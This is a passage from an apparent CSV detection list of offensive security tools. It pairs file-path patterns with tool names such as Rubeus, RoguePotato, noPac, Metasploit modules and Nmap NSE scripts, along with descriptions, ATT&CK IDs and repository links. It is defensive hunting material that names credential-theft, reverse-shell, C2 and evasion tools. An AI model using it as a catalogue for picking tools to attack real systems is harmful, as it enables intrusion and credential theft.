T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/reverse-shell-generator*,offensive_tool_keyword,reverse-shell-generator,Hosted Reverse Shell generator with a ton of functionality,T1059 T1071,N/A,N/A,N/A,POST Exploitation tools,https://github.com/0dayCTF/reverse-shell-generator,1,1,N/A,N/A,10,2271,510,2023-08-12T15:06:21Z,2021-02-27T00:53:13Z -*/rexec-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rfc868-time.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/RGPerson.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/riak-http-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ricardojba/Invoke-noPac*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0003 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/ricardojba/Invoke-noPac,1,1,N/A,N/A,1,57,12,2023-02-16T10:45:19Z,2021-12-13T19:01:18Z -*/ricardojba/noPac*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0003 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/ricardojba/noPac,1,1,N/A,N/A,1,34,5,2021-12-19T17:42:12Z,2021-12-13T18:51:31Z -*/rid_hijack.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/ridenum/ridenum.py*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/Ridter/noPac*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0003 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,1,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*/rlogin-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rmi-dumpregistry.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rmi-vuln-classloader.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ROADtools/*,offensive_tool_keyword,ROADtools,A collection of Azure AD tools for offensive and defensive security purposes,T1136.003 - T1078.004 - T1021.006 - T1003.003,TA0002 - TA0004 - TA0005 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dirkjanm/ROADtools,1,1,N/A,N/A,10,1353,206,2023-09-27T08:30:55Z,2020-03-28T09:56:08Z -*/rockyou.txt*,offensive_tool_keyword,AD exploitation cheat sheet,Crack the hash with Hashcat,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rockyou.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/rockyou.txt*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/RoguePotato.git*,offensive_tool_keyword,RoguePotato,Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/RoguePotato,1,1,N/A,10,9,876,125,2021-01-09T20:43:07Z,2020-05-10T17:38:28Z -*/RogueWinRMdll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/RogueWinRMexe*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/root/.mozilla/firefox/*.Exegol*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/root/output/ratchatPT*,offensive_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,1,0,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*/root/shellcode.c*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*/root/shellcode.cpp*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*/root/shellcode.exe*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*/root/viper/*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/root/viper/dist*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,0,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/rop_emporium*,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,1,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -*/ropbuffers.go*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*/ropfuscator*,offensive_tool_keyword,ropfuscator,ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).,T1090 - T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ropfuscator/ropfuscator,1,1,N/A,N/A,4,375,30,2023-08-11T00:41:55Z,2021-11-16T18:13:57Z -*/rottenpotato*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/rpcap-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rpcap-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rpcbomb.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/rpc-grind.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rpcinfo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rpcrt.py *,offensive_tool_keyword,POC,Remote Code Execution Exploit in the RPC Library CVE-2022-26809,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/yuanLink/CVE-2022-26809,1,0,N/A,N/A,1,62,26,2022-05-25T00:57:52Z,2022-05-01T13:19:10Z -*/rpivot.git*,offensive_tool_keyword,rpivot,socks4 reverse proxy for penetration testing,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/klsecservices/rpivot,1,1,N/A,10,10,490,125,2018-07-12T09:53:13Z,2016-09-07T17:25:57Z -*/rsa-vuln-roca.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rservices_from_users.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/rsocx-*-linux-x86-64.zip*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,1,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*/rsocx-*-windows-x86-64.zip*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,1,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*/rsocx.exe*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,1,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*/rsocx.git*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,1,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*/rsync-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rsync-list-modules.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rtsp-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rtsp-url-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Rubeus*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,POST Exploitation tools,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*/Rubeus/*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*/Rudrastra.git*,offensive_tool_keyword,Rudrastra,Make a Fake wireless access point aka Evil Twin,T1491 - T1090.004 - T1557.001,TA0040 - TA0011 - TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/SxNade/Rudrastra,1,1,N/A,8,1,46,21,2023-04-22T15:10:42Z,2020-11-05T09:38:15Z -*/rulerforms.go*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*/run/leet.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/run_as_psh.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/RunasCs.cs*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,0,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*/RunasCs.git*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,1,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*/RunasCs.git*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,1,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*/RunasCs.zip*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,1,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*/RunAsWinTcb.git*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,1,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*/RunAsWinTcb.iml*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,1,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*/runcalc.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/rundll32.cmd*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/rundll32_js*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/RunOF/RunOF/*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 